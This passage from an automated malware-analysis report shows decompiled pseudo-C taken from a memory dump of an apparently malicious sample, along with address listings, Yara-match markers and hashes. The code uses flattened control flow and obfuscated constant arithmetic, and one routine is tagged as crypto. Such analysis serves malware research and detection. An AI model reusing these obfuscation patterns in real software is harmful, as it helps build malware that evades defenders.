				_v1668 = 0xfd750c;
				_v1668 = _v1668 >> 1;
				_v1668 = _v1668 << 3;
				_v1668 = _v1668 ^ 0x03f0c5f0;
				_v1700 = 0xe618e7;
				_v1700 = _v1700 | 0xd14a9f7e;
				_v1700 = _v1700 ^ 0x50c0015a;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 ^ 0x4092d66a;
				_v1732 = 0x311c59;
				_v1732 = _v1732 | 0x1d4d615b;
				_v1732 = _v1732 + 0xffff12fd;
				_v1732 = _v1732 >> 3;
				_v1732 = _v1732 ^ 0x03a0715e;
				_v1580 = 0x6c3800;
				_v1580 = _v1580 ^ 0x0701ab83;
				_v1580 = _v1580 ^ 0x076e5a87;
				_v1680 = 0x89170c;
				_v1680 = _v1680 | 0x04b16a81;
				_v1680 = _v1680 ^ 0xfa3b9c1d;
				_v1680 = _v1680 ^ 0xfe8db652;
				_v1688 = 0xb87b48;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xae40cf0d;
				_v1688 = _v1688 ^ 0xaf3a1319;
				_v1660 = 0x9f9940;
				_v1660 = _v1660 | 0x53564beb;
				_v1660 = _v1660 + 0x505b;
				_v1660 = _v1660 ^ 0x53e33529;
				_v1600 = 0xb16c74;
				_v1600 = _v1600 * 0x6d;
				_v1600 = _v1600 ^ 0x4b81be43;
				_v1608 = 0x2a287c;
				_v1608 = _v1608 | 0x04ab5535;
				_v1608 = _v1608 ^ 0x04a38853;
				_v1616 = 0x89c80a;
				_v1616 = _v1616 | 0x954cf2f1;
				_v1616 = _v1616 ^ 0x95c7435e;
				_v1720 = 0xed19c5;
				_v1720 = _v1720 + 0x5778;
				_v1720 = _v1720 / _t482;
				_v1720 = _v1720 | 0xf3a69058;
				_v1720 = _v1720 ^ 0xf3ab39a1;
				_v1640 = 0xb2891c;
				_v1640 = _v1640 + 0x5668;
				_t483 = 0x38;
				_v1640 = _v1640 / _t483;
				_v1640 = _v1640 ^ 0x00008dd3;
				_v1624 = 0x99c5ec;
				_v1624 = _v1624 << 0xa;
				_v1624 = _v1624 ^ 0x671b74a8;
				_v1728 = 0x12e9b6;
				_v1728 = _v1728 + 0xffff9a22;
				_v1728 = _v1728 ^ 0xdf168593;
				_v1728 = _v1728 >> 3;
				_v1728 = _v1728 ^ 0x1be0d240;
				_v1648 = 0x44db66;
				_v1648 = _v1648 << 5;
				_v1648 = _v1648 + 0xffffd6a5;
				_v1648 = _v1648 ^ 0x0890d14f;
				_v1736 = 0x3d89fa;
				_v1736 = _v1736 | 0x17dab9fa;
				_v1736 = _v1736 << 0xb;
				_v1736 = _v1736 + 0x5385;
				_v1736 = _v1736 ^ 0xfdde1303;
				_v1656 = 0xd3b8a3;
				_v1656 = _v1656 + 0xffff3f01;
				_v1656 = _v1656 >> 0xd;
				_v1656 = _v1656 ^ 0x000ca91d;
				_v1744 = 0x4b62a6;
				_v1744 = _v1744 | 0x87af92a3;
				_v1744 = _v1744 + 0x6243;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0x0430b30b;
				_v1596 = 0x609a66;
				_v1596 = _v1596 + 0x67ed;
				_v1596 = _v1596 ^ 0x006685f4;
				_v1568 = 0xe1fc2d;
				_v1568 = _v1568 + 0xffffa85e;
				_v1568 = _v1568 ^ 0x00e0c85f;
				_v1664 = 0x458e39;
				_v1664 = _v1664 | 0xe1a9ddeb;
				_v1664 = _v1664 + 0xa342;
				_v1664 = _v1664 ^ 0xe1ebbc10;
				_v1692 = 0x21a211;
				_v1692 = _v1692 ^ 0xf70e94e6;
				_v1692 = _v1692 | 0x495e1ff5;
				_v1692 = _v1692 ^ 0xff731ba7;
				_v1592 = 0xe0a826;
				_v1592 = _v1592 | 0x1c2a3267;
				_v1592 = _v1592 ^ 0x1cefcd0b;
				_v1712 = 0x24bd80;
				_v1712 = _v1712 | 0x7fffefff;
				_v1712 = _v1712 ^ 0x7ff9a260;
				_v1708 = 0xb697;
				_v1708 = _v1708 >> 0xa;
				_v1708 = _v1708 + 0xffffb905;
				_t484 = 0x3a;
				_v1708 = _v1708 / _t484;
				_v1708 = _v1708 ^ 0x046598a2;
				_v1564 = 0xca9a3a;
				_v1564 = _v1564 + 0xdbe7;
				_v1564 = _v1564 ^ 0x00cf55d9;
				_v1672 = 0x92ef8e;
				_t485 = 0x3c;
				_v1672 = _v1672 / _t485;
				_v1672 = _v1672 >> 8;
				_v1672 = _v1672 ^ 0x000477f6;
				_v1584 = 0x1b1235;
				_v1584 = _v1584 ^ 0x13c2311f;
				_v1584 = _v1584 ^ 0x13d0aaf6;
				_v1696 = 0xd2fdc3;
				_v1696 = _v1696 + 0xfffff708;
				_t486 = 0x60;
				_t493 = _v1576;
				_t487 = _v1576;
				_t439 = _v1576;
				_v1696 = _v1696 / _t486;
				_v1696 = _v1696 + 0xffff2ac1;
				_v1696 = _v1696 ^ 0x00067714;
				_v1704 = 0x852645;
				_v1704 = _v1704 + 0xffff3725;
				_v1704 = _v1704 | 0x39ebeb31;
				_v1704 = _v1704 >> 7;
				_v1704 = _v1704 ^ 0x007ab2fb;
				while(1) {
					L1:
					_t470 = 0x5c;
					do {
						while(1) {
							L2:
							_t496 = _t440 - 0xab4f50e;
							if(_t496 <= 0) {
								break;
							}
							__eflags = _t440 - 0xac222e1;
							if(_t440 == 0xac222e1) {
								E0110B464(_t439, _v1592, _v1712, _t493);
								_t440 = 0x7220489;
								_t470 = 0x5c;
								goto L26;
							} else {
								__eflags = _t440 - 0xb1fd63d;
								if(_t440 == 0xb1fd63d) {
									_t489 =  *0x1125218 + 0x234;
									while(1) {
										__eflags =  *_t489 - _t470;
										if(__eflags == 0) {
											break;
										}
										_t489 = _t489 + 2;
										__eflags = _t489;
									}
									_t487 = _t489 + 2;
									_t440 = 0xc7cbd0f;
									continue;
								} else {
									__eflags = _t440 - 0xc7cbd0f;
									if(_t440 != 0xc7cbd0f) {
										goto L26;
									} else {
										_t438 = E0110ACDB(_t440, _v1600, _v1608, _v1632, _t440, _v1616);
										_t439 = _t438;
										_t494 =  &(_t494[4]);
										__eflags = _t438;
										if(__eflags != 0) {
											_t440 = 0xab4f50e;
											while(1) {
												L1:
												_t470 = 0x5c;
												goto L2;
											}
										}
									}
								}
							}
							L9:
							return _t490;
						}
						if(_t496 == 0) {
							_t424 = E0111B3BE(_t487, _v1720, _t440, _v1640, _v1624, _v1728, _v1588, _v1648, _v1736, _t440, _v1572, _t440, _v1656, _v1744, _v1748, _t439, _t440, _v1596,  &_v520, _t440, _v1568, _v1664, _v1604, _t487, _v1692);
							_t493 = _t424;
							_t494 =  &(_t494[0x17]);
							__eflags = _t424;
							if(__eflags == 0) {
								goto L11;
							} else {
								_t440 = 0xac222e1;
								_t490 = 1;
								_v1576 = 1;
								goto L1;
							}
						} else {
							if(_t440 == 0x4d2f71a) {
								_push(_v1676);
								_push(_v1652);
								_t425 = E0111CD35(0x1101020, _v1716, __eflags);
								E011223F2( &_v1560, __eflags);
								E0111E35F( *0x1125218 + 0x18, __eflags, _v1724, _v1636, _v1612, 0x104, _v1668,  &_v520,  &_v1560, _t425, _v1700,  *0x1125218 + 0x234, _v1732);
								E0111629F(_v1580, _t425, _v1680, _v1688, _v1660);
								_t490 = _v1576;
								_t494 =  &(_t494[0x10]);
								_t440 = 0xb1fd63d;
								while(1) {
									L1:
									_t470 = 0x5c;
									goto L2;
								}
							} else {
								if(_t440 == 0x6dd668d) {
									E0110B3B4(_v1644, _t440, _v1684, _t440, _v1740,  &_v1040, _v1628, _v1620);
									_t494 =  &(_t494[7]);
									_t440 = 0x4d2f71a;
									while(1) {
										L1:
										_t470 = 0x5c;
										goto L2;
									}
								} else {
									if(_t440 == 0x7220489) {
										E0110EDC5(_v1708, _t493, _v1564, _v1672);
										L11:
										_t440 = 0x739dfbe;
										while(1) {
											L1:
											_t470 = 0x5c;
											goto L2;
										}
									} else {
										if(_t440 != 0x739dfbe) {
											goto L26;
										} else {
											E0110EDC5(_v1584, _t439, _v1696, _v1704);
										}
									}
								}
							}
						}
						goto L9;
						L26:
						__eflags = _t440 - 0x18c7ad4;
					} while (__eflags != 0);
					goto L9;
				}
			}






































































                          0x011059bf
                          0x011059c5
                          0x011059d2
                          0x011059da
                          0x011059df
                          0x011059ea
                          0x011059f2
                          0x01105a00
                          0x01105a07
                          0x01105a09
                          0x01105a14
                          0x01105a1f
                          0x01105a2a
                          0x01105a35
                          0x01105a3d
                          0x01105a42
                          0x01105a4a
                          0x01105a4f
                          0x01105a57
                          0x01105a62
                          0x01105a6d
                          0x01105a78
                          0x01105a83
                          0x01105a8e
                          0x01105a99
                          0x01105aa1
                          0x01105aa9
                          0x01105ab1
                          0x01105ab9
                          0x01105ac1
                          0x01105ac9
                          0x01105ad1
                          0x01105ad9
                          0x01105ae1
                          0x01105aec
                          0x01105af1
                          0x01105af7
                          0x01105afc
                          0x01105b04
                          0x01105b0f
                          0x01105b17
                          0x01105b22
                          0x01105b2a
                          0x01105b32
                          0x01105b3a
                          0x01105b42
                          0x01105b4a
                          0x01105b57
                          0x01105b58
                          0x01105b5f
                          0x01105b68
                          0x01105b6c
                          0x01105b74
                          0x01105b7c
                          0x01105b84
                          0x01105b8c
                          0x01105b94
                          0x01105b9c
                          0x01105ba6
                          0x01105baa
                          0x01105baf
                          0x01105bb7
                          0x01105bcb
                          0x01105bd2
                          0x01105bda
                          0x01105be5
                          0x01105bfc
                          0x01105bff
                          0x01105c06
                          0x01105c11
                          0x01105c19
                          0x01105c1d
                          0x01105c22
                          0x01105c2a
                          0x01105c32
                          0x01105c3a
                          0x01105c42
                          0x01105c46
                          0x01105c4e
                          0x01105c56
                          0x01105c5e
                          0x01105c66
                          0x01105c6b
                          0x01105c73
                          0x01105c7e
                          0x01105c89
                          0x01105c94
                          0x01105c9c
                          0x01105ca4
                          0x01105cac
                          0x01105cb4
                          0x01105cbc
                          0x01105cc0
                          0x01105cc8
                          0x01105cd0
                          0x01105cd8
                          0x01105ce0
                          0x01105ce8
                          0x01105cf0
                          0x01105d03
                          0x01105d0a
                          0x01105d15
                          0x01105d20
                          0x01105d2b
                          0x01105d36
                          0x01105d41
                          0x01105d4c
                          0x01105d57
                          0x01105d5f
                          0x01105d6f
                          0x01105d73
                          0x01105d7b
                          0x01105d83
                          0x01105d8e
                          0x01105da0
                          0x01105da3
                          0x01105da7
                          0x01105daf
                          0x01105dba
                          0x01105dc2
                          0x01105dcd
                          0x01105dd5
                          0x01105ddd
                          0x01105de5
                          0x01105dea
                          0x01105df2
                          0x01105dfa
                          0x01105dff
                          0x01105e07
                          0x01105e0f
                          0x01105e17
                          0x01105e1f
                          0x01105e24
                          0x01105e2c
                          0x01105e34
                          0x01105e3c
                          0x01105e44
                          0x01105e49
                          0x01105e53
                          0x01105e5b
                          0x01105e63
                          0x01105e6b
                          0x01105e70
                          0x01105e78
                          0x01105e83
                          0x01105e8e
                          0x01105e99
                          0x01105ea4
                          0x01105eaf
                          0x01105eba
                          0x01105ec2
                          0x01105eca
                          0x01105ed2
                          0x01105eda
                          0x01105ee2
                          0x01105eea
                          0x01105ef2
                          0x01105efa
                          0x01105f05
                          0x01105f10
                          0x01105f1b
                          0x01105f23
                          0x01105f2b
                          0x01105f33
                          0x01105f3b
                          0x01105f40
                          0x01105f4e
                          0x01105f53
                          0x01105f59
                          0x01105f61
                          0x01105f6c
                          0x01105f77
                          0x01105f82
                          0x01105f8e
                          0x01105f93
                          0x01105f99
                          0x01105f9e
                          0x01105fa6
                          0x01105fb1
                          0x01105fbc
                          0x01105fc7
                          0x01105fcf
                          0x01105fdb
                          0x01105fde
                          0x01105fe5
                          0x01105fec
                          0x01105ff3
                          0x01105ff7
                          0x01105fff
                          0x01106007
                          0x0110600f
                          0x01106017
                          0x0110601f
                          0x01106024
                          0x0110602c
                          0x0110602c
                          0x0110602e
                          0x0110602f
                          0x0110602f
                          0x0110602f
                          0x0110602f
                          0x01106035
                          0x00000000
                          0x00000000
                          0x01106230
                          0x01106236
                          0x011062b2
                          0x011062bb
                          0x011062c0
                          0x00000000
                          0x01106238
                          0x01106238
                          0x0110623e
                          0x01106287
                          0x01106292
                          0x01106292
                          0x01106295
                          0x00000000
                          0x00000000
                          0x0110628f
                          0x0110628f
                          0x0110628f
                          0x01106297
                          0x0110629a
                          0x00000000
                          0x01106240
                          0x01106240
                          0x01106246
                          0x00000000
                          0x01106248
                          0x01106265
                          0x0110626a
                          0x0110626c
                          0x0110626f
                          0x01106271
                          0x01106277
                          0x0110602c
                          0x0110602c
                          0x0110602e
                          0x00000000
                          0x0110602e
                          0x0110602c
                          0x01106271
                          0x01106246
                          0x0110623e
                          0x01106082
                          0x0110608d
                          0x0110608d
                          0x0110603b
                          0x0110620a
                          0x0110620f
                          0x01106211
                          0x01106214
                          0x01106216
                          0x00000000
                          0x0110621c
                          0x0110621e
                          0x01106223
                          0x01106224
                          0x00000000
                          0x01106224
                          0x01106041
                          0x01106047
                          0x011060e9
                          0x011060f2
                          0x011060fa
                          0x01106108
                          0x0110615f
                          0x01106182
                          0x01106187
                          0x0110618e
                          0x01106191
                          0x0110602c
                          0x0110602c
                          0x0110602e
                          0x00000000
                          0x0110602e
                          0x0110604d
                          0x01106053
                          0x011060d7
                          0x011060dc
                          0x011060df
                          0x0110602c
                          0x0110602c
                          0x0110602e
                          0x00000000
                          0x0110602e
                          0x01106055
                          0x0110605b
                          0x0110609f
                          0x011060a6
                          0x011060a6
                          0x0110602c
                          0x0110602c
                          0x0110602e
                          0x00000000
                          0x0110602e
                          0x0110605d
                          0x01106063
                          0x00000000
                          0x01106069
                          0x0110607a
                          0x01106080
                          0x01106063
                          0x0110605b
                          0x01106053
                          0x01106047
                          0x00000000
                          0x011062c1
                          0x011062c1
                          0x011062c1
                          0x00000000
                          0x011062cd

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "O$)5S$,-$19$Cb$Uu$hV$xW$|(*$g
                          • API String ID: 0-1036375657
                          • Opcode ID: 553e84fed662b9cbbf15b6a08b099fb1397b0e953069845ae40ad2317dd5b23a
                          • Instruction ID: 7a5f8b7be0d298d91d7a4ebcd913977a0e4d532b61a3b50e0df37421ae0410c3
                          • Opcode Fuzzy Hash: 553e84fed662b9cbbf15b6a08b099fb1397b0e953069845ae40ad2317dd5b23a
                          • Instruction Fuzzy Hash: 3922207150D3819FD3A9CF65C54AA9BFBE2FBC0718F10891DE29A86260C7B18958CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01106869, Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E01106869(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _t425;
				signed int _t445;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t496;
				void* _t497;
				signed int* _t501;

				_t501 =  &_v2784;
				_v2736 = 0xd70c46;
				_v2736 = _v2736 << 6;
				_v2736 = _v2736 >> 5;
				_v2736 = _v2736 ^ 0x01ae18a5;
				_v2628 = 0x2b2d03;
				_t496 = __ecx;
				_t497 = 0xe76a3a8;
				_t448 = 0x59;
				_v2628 = _v2628 / _t448;
				_v2628 = _v2628 ^ 0x000f0bd3;
				_v2780 = 0x555899;
				_v2780 = _v2780 ^ 0x1a2e1782;
				_v2780 = _v2780 >> 6;
				_t449 = 0x70;
				_v2780 = _v2780 * 0x1e;
				_v2780 = _v2780 ^ 0x0c60a122;
				_v2620 = 0x3757e0;
				_v2620 = _v2620 >> 0xf;
				_v2620 = _v2620 ^ 0x0002f966;
				_v2684 = 0xb11485;
				_v2684 = _v2684 >> 5;
				_v2684 = _v2684 << 2;
				_v2684 = _v2684 ^ 0x001d02ff;
				_v2728 = 0x41bcba;
				_v2728 = _v2728 / _t449;
				_v2728 = _v2728 | 0x0391f118;
				_v2728 = _v2728 ^ 0x0396fd83;
				_v2696 = 0xc1937c;
				_v2696 = _v2696 ^ 0x2234657c;
				_v2696 = _v2696 << 4;
				_v2696 = _v2696 ^ 0x2f5aa2df;
				_v2748 = 0x9680ae;
				_v2748 = _v2748 ^ 0xdbb0bcef;
				_v2748 = _v2748 + 0x5e53;
				_v2748 = _v2748 + 0x5e6f;
				_v2748 = _v2748 ^ 0xdb27b888;
				_v2704 = 0xc50fbb;
				_v2704 = _v2704 ^ 0x111a2fa3;
				_t450 = 0x2e;
				_v2704 = _v2704 / _t450;
				_v2704 = _v2704 ^ 0x0069a71a;
				_v2668 = 0xe40b9e;
				_v2668 = _v2668 ^ 0xdc1f8f20;
				_v2668 = _v2668 ^ 0xdcfe6789;
				_v2612 = 0xe14343;
				_v2612 = _v2612 << 0xf;
				_v2612 = _v2612 ^ 0xa1ab00ea;
				_v2772 = 0xbe2c30;
				_v2772 = _v2772 + 0xf5f8;
				_t451 = 0x19;
				_v2772 = _v2772 / _t451;
				_v2772 = _v2772 << 4;
				_v2772 = _v2772 ^ 0x007712b1;
				_v2720 = 0x61965;
				_t445 = 0x4d;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 7;
				_v2720 = _v2720 ^ 0x000aecf1;
				_v2604 = 0xad6ca1;
				_t452 = 0x1c;
				_v2604 = _v2604 / _t452;
				_v2604 = _v2604 ^ 0x000c2534;
				_v2756 = 0x44e9a5;
				_v2756 = _v2756 + 0xffff5377;
				_v2756 = _v2756 | 0x69391a2d;
				_v2756 = _v2756 >> 0xd;
				_v2756 = _v2756 ^ 0x0000d2ac;
				_v2652 = 0xe29325;
				_v2652 = _v2652 | 0x9951b1c8;
				_v2652 = _v2652 ^ 0x99fb4cd5;
				_v2680 = 0x106b4b;
				_v2680 = _v2680 >> 0xc;
				_v2680 = _v2680 ^ 0x0008378d;
				_v2660 = 0xce2cee;
				_v2660 = _v2660 ^ 0xabd025b6;
				_v2660 = _v2660 ^ 0xab117388;
				_v2636 = 0xe72c5a;
				_v2636 = _v2636 << 1;
				_v2636 = _v2636 ^ 0x01cfd1bd;
				_v2764 = 0xce9bac;
				_v2764 = _v2764 >> 0xd;
				_v2764 = _v2764 << 0xf;
				_v2764 = _v2764 ^ 0x6cd849b1;
				_v2764 = _v2764 ^ 0x6fe47cdc;
				_v2608 = 0xdab50e;
				_t453 = 0x6c;
				_v2608 = _v2608 * 0x58;
				_v2608 = _v2608 ^ 0x4b21ebc8;
				_v2644 = 0x21e7e8;
				_v2644 = _v2644 >> 6;
				_v2644 = _v2644 ^ 0x0003a4ec;
				_v2712 = 0xe3911c;
				_v2712 = _v2712 / _t445;
				_v2712 = _v2712 * 0x43;
				_v2712 = _v2712 ^ 0x00cdd074;
				_v2688 = 0xdd1a93;
				_v2688 = _v2688 ^ 0x7985c00e;
				_v2688 = _v2688 << 3;
				_v2688 = _v2688 ^ 0xcac8c97c;
				_v2616 = 0x5faab1;
				_v2616 = _v2616 ^ 0x1b6fd98f;
				_v2616 = _v2616 ^ 0x1b3ded53;
				_v2724 = 0x954f7;
				_v2724 = _v2724 / _t453;
				_v2724 = _v2724 ^ 0x5ad7c010;
				_v2724 = _v2724 ^ 0x5ad74941;
				_v2672 = 0xf78f3b;
				_v2672 = _v2672 << 9;
				_v2672 = _v2672 ^ 0xef18aa44;
				_v2732 = 0x9cb3b1;
				_v2732 = _v2732 >> 4;
				_v2732 = _v2732 ^ 0xe2d83eaa;
				_v2732 = _v2732 ^ 0xe2ddc922;
				_v2676 = 0x4f63c;
				_v2676 = _v2676 | 0x7938451b;
				_v2676 = _v2676 ^ 0x7932d1fc;
				_v2784 = 0x227d8e;
				_v2784 = _v2784 * 0x70;
				_v2784 = _v2784 + 0x10ae;
				_v2784 = _v2784 + 0xffff0036;
				_v2784 = _v2784 ^ 0x0f16d66c;
				_v2656 = 0x8f5d03;
				_v2656 = _v2656 + 0xffffcb10;
				_v2656 = _v2656 ^ 0x008c40fc;
				_v2664 = 0x147a35;
				_v2664 = _v2664 + 0x72cc;
				_v2664 = _v2664 ^ 0x0013eff9;
				_v2708 = 0x3f889f;
				_v2708 = _v2708 + 0xffffe0c7;
				_v2708 = _v2708 << 4;
				_v2708 = _v2708 ^ 0x03f50c5f;
				_v2776 = 0x4b8e23;
				_v2776 = _v2776 | 0x95de3289;
				_v2776 = _v2776 + 0xffffaca1;
				_v2776 = _v2776 >> 0xa;
				_v2776 = _v2776 ^ 0x0024a504;
				_v2716 = 0xa59736;
				_v2716 = _v2716 + 0xff6b;
				_v2716 = _v2716 | 0x7b3af132;
				_v2716 = _v2716 ^ 0x7bbb5486;
				_v2640 = 0x9c4b93;
				_v2640 = _v2640 + 0xffff33f3;
				_v2640 = _v2640 ^ 0x0090f653;
				_v2648 = 0xf61d93;
				_v2648 = _v2648 | 0x4192b52a;
				_v2648 = _v2648 ^ 0x41f40c5d;
				_v2632 = 0xed7875;
				_v2632 = _v2632 >> 9;
				_v2632 = _v2632 ^ 0x000d0692;
				_v2692 = 0x914f94;
				_v2692 = _v2692 ^ 0xe0988b56;
				_v2692 = _v2692 << 3;
				_v2692 = _v2692 ^ 0x004aa312;
				_v2768 = 0x3b95d3;
				_v2768 = _v2768 >> 0xe;
				_v2768 = _v2768 >> 8;
				_v2768 = _v2768 | 0x90778fa3;
				_v2768 = _v2768 ^ 0x907ffb5b;
				_v2700 = 0x78c939;
				_t454 = 0x4f;
				_v2700 = _v2700 / _t454;
				_v2700 = _v2700 * 0x43;
				_v2700 = _v2700 ^ 0x00613dde;
				_v2744 = 0xacd4ca;
				_v2744 = _v2744 * 0x60;
				_v2744 = _v2744 ^ 0x1bb6e038;
				_v2744 = _v2744 | 0x0be4115d;
				_v2744 = _v2744 ^ 0x5bf4c74e;
				_v2624 = 0xe52846;
				_v2624 = _v2624 | 0x37888519;
				_v2624 = _v2624 ^ 0x37e7174c;
				_v2752 = 0xa93f91;
				_v2752 = _v2752 * 0x6b;
				_v2752 = _v2752 * 0x7b;
				_v2752 = _v2752 ^ 0x7befb542;
				_v2752 = _v2752 ^ 0x86fdbe14;
				_v2740 = 0x2ae576;
				_v2740 = _v2740 + 0xbc14;
				_v2740 = _v2740 + 0xffff6f1a;
				_v2740 = _v2740 ^ 0x002d5a1a;
				_v2760 = 0x7dbeee;
				_v2760 = _v2760 << 0xa;
				_v2760 = _v2760 >> 7;
				_t425 = _v2760 * 0x13;
				_v2760 = _t425;
				_v2760 = _v2760 ^ 0x24a154d6;
				do {
					while(_t497 != 0x13254dd) {
						if(_t497 == 0xe76a3a8) {
							_t497 = 0x13254dd;
							continue;
						} else {
							_t509 = _t497 - 0xf9d6351;
							if(_t497 == 0xf9d6351) {
								E0110B3B4(_v2724, _t454, _v2672, _t454, _v2732,  &_v1040, _v2676, _v2736);
								_push(_v2664);
								_push(_v2656);
								E01112EA5( &_v2080, _t509,  &_v1040, 0x11014d4, _v2776, _v2716, E0111CD35(0x11014d4, _v2784, _t509), _v2640, _v2648,  &_v520);
								E0111629F(_v2632, _t438, _v2692, _v2768, _v2700);
								return E0111EA55( &_v520, _v2744, 0, _v2624, 0, _v2752, 0, _v2740, _v2760, 0);
							}
							goto L9;
						}
						L5:
						return _t425;
					}
					E0111855C( &_v2600, _v2628, __eflags, _v2780, _v2620, _t454, _v2684);
					 *((short*)(E01102B69(_v2728, _v2696,  &_v2600, _v2748))) = 0;
					E01103432( &_v1560, _v2704, __eflags, _v2668);
					_push(_v2720);
					_push(_v2772);
					E01112EA5( &_v1560, __eflags,  &_v2600, 0x1101404, _v2756, _v2652, E0111CD35(0x1101404, _v2612, __eflags), _v2680, _v2660,  &_v2080);
					E0111629F(_v2636, _t430, _v2764, _v2608, _v2644);
					_t454 = _t496;
					_t425 = E0111E5A7(_t496, _v2712, _v2688,  &_v2080, _v2616);
					_t501 =  &(_t501[0x17]);
					__eflags = _t425;
					if(_t425 != 0) {
						_t497 = 0xf9d6351;
						goto L9;
					}
					goto L5;
					L9:
					__eflags = _t497 - 0x7fda310;
				} while (__eflags != 0);
				return _t425;
			}

































































                          0x01106869
                          0x0110686f
                          0x01106879
                          0x0110687e
                          0x01106883
                          0x0110688b
                          0x011068a3
                          0x011068a5
                          0x011068aa
                          0x011068af
                          0x011068b8
                          0x011068c3
                          0x011068cb
                          0x011068d3
                          0x011068dd
                          0x011068e0
                          0x011068e4
                          0x011068ec
                          0x011068f7
                          0x011068ff
                          0x0110690a
                          0x01106912
                          0x01106917
                          0x0110691c
                          0x01106924
                          0x01106934
                          0x01106938
                          0x01106940
                          0x01106948
                          0x01106950
                          0x01106958
                          0x0110695d
                          0x01106965
                          0x0110696d
                          0x01106975
                          0x0110697d
                          0x01106985
                          0x0110698d
                          0x01106995
                          0x011069a1
                          0x011069a6
                          0x011069ac
                          0x011069b4
                          0x011069bf
                          0x011069ca
                          0x011069d5
                          0x011069e0
                          0x011069e8
                          0x011069f3
                          0x011069fb
                          0x01106a07
                          0x01106a0c
                          0x01106a12
                          0x01106a17
                          0x01106a1f
                          0x01106a2b
                          0x01106a2e
                          0x01106a32
                          0x01106a39
                          0x01106a41
                          0x01106a55
                          0x01106a5a
                          0x01106a61
                          0x01106a6c
                          0x01106a74
                          0x01106a7c
                          0x01106a84
                          0x01106a89
                          0x01106a91
                          0x01106a9c
                          0x01106aa7
                          0x01106ab2
                          0x01106aba
                          0x01106abf
                          0x01106ac7
                          0x01106ad2
                          0x01106add
                          0x01106ae8
                          0x01106af3
                          0x01106afa
                          0x01106b05
                          0x01106b0d
                          0x01106b12
                          0x01106b17
                          0x01106b1f
                          0x01106b27
                          0x01106b3c
                          0x01106b3d
                          0x01106b44
                          0x01106b4f
                          0x01106b5a
                          0x01106b62
                          0x01106b6d
                          0x01106b7d
                          0x01106b86
                          0x01106b8a
                          0x01106b92
                          0x01106b9a
                          0x01106ba2
                          0x01106ba7
                          0x01106baf
                          0x01106bba
                          0x01106bc5
                          0x01106bd0
                          0x01106bde
                          0x01106be2
                          0x01106bea
                          0x01106bf2
                          0x01106bfd
                          0x01106c05
                          0x01106c10
                          0x01106c18
                          0x01106c1d
                          0x01106c25
                          0x01106c2d
                          0x01106c35
                          0x01106c3d
                          0x01106c45
                          0x01106c52
                          0x01106c56
                          0x01106c5e
                          0x01106c66
                          0x01106c6e
                          0x01106c79
                          0x01106c84
                          0x01106c91
                          0x01106ca1
                          0x01106cb1
                          0x01106cbc
                          0x01106cc4
                          0x01106ccc
                          0x01106cd1
                          0x01106cd9
                          0x01106ce1
                          0x01106ce9
                          0x01106cf1
                          0x01106cf6
                          0x01106cfe
                          0x01106d06
                          0x01106d0e
                          0x01106d16
                          0x01106d1e
                          0x01106d29
                          0x01106d34
                          0x01106d3f
                          0x01106d4a
                          0x01106d55
                          0x01106d60
                          0x01106d6b
                          0x01106d73
                          0x01106d7e
                          0x01106d86
                          0x01106d8e
                          0x01106d93
                          0x01106d9b
                          0x01106da3
                          0x01106da8
                          0x01106dad
                          0x01106db5
                          0x01106dbd
                          0x01106dcb
                          0x01106dce
                          0x01106dd7
                          0x01106ddb
                          0x01106de3
                          0x01106df0
                          0x01106df4
                          0x01106dfc
                          0x01106e04
                          0x01106e0c
                          0x01106e17
                          0x01106e22
                          0x01106e2d
                          0x01106e3a
                          0x01106e43
                          0x01106e47
                          0x01106e4f
                          0x01106e57
                          0x01106e5f
                          0x01106e67
                          0x01106e6f
                          0x01106e77
                          0x01106e7f
                          0x01106e84
                          0x01106e89
                          0x01106e8e
                          0x01106e92
                          0x01106e9a
                          0x01106e9a
                          0x01106ea8
                          0x01106f91
                          0x00000000
                          0x01106eae
                          0x01106eae
                          0x01106eb0
                          0x01106eda
                          0x01106edf
                          0x01106eeb
                          0x01106f33
                          0x01106f53
                          0x00000000
                          0x01106f83
                          0x00000000
                          0x01106eb0
                          0x01106f90
                          0x01106f90
                          0x01106f90
                          0x01106fb6
                          0x01106fe1
                          0x01106feb
                          0x01106ff0
                          0x01106ff9
                          0x01107047
                          0x01107067
                          0x0110707a
                          0x0110708b
                          0x01107090
                          0x01107093
                          0x01107095
                          0x0110709b
                          0x00000000
                          0x0110709b
                          0x00000000
                          0x0110709d
                          0x0110709d
                          0x0110709d
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6$CC$F($Z,$o^$ux$v*$|e4"$W7$!
                          • API String ID: 0-404381705
                          • Opcode ID: 53059088e70fc9ad6164f25f4c2ccab05de717a6484ce737eb93a46c076b62cc
                          • Instruction ID: af2c7a6a91fccaf1322d364b6e42fdc17250af44484d1a554f6a7ffed904d1d8
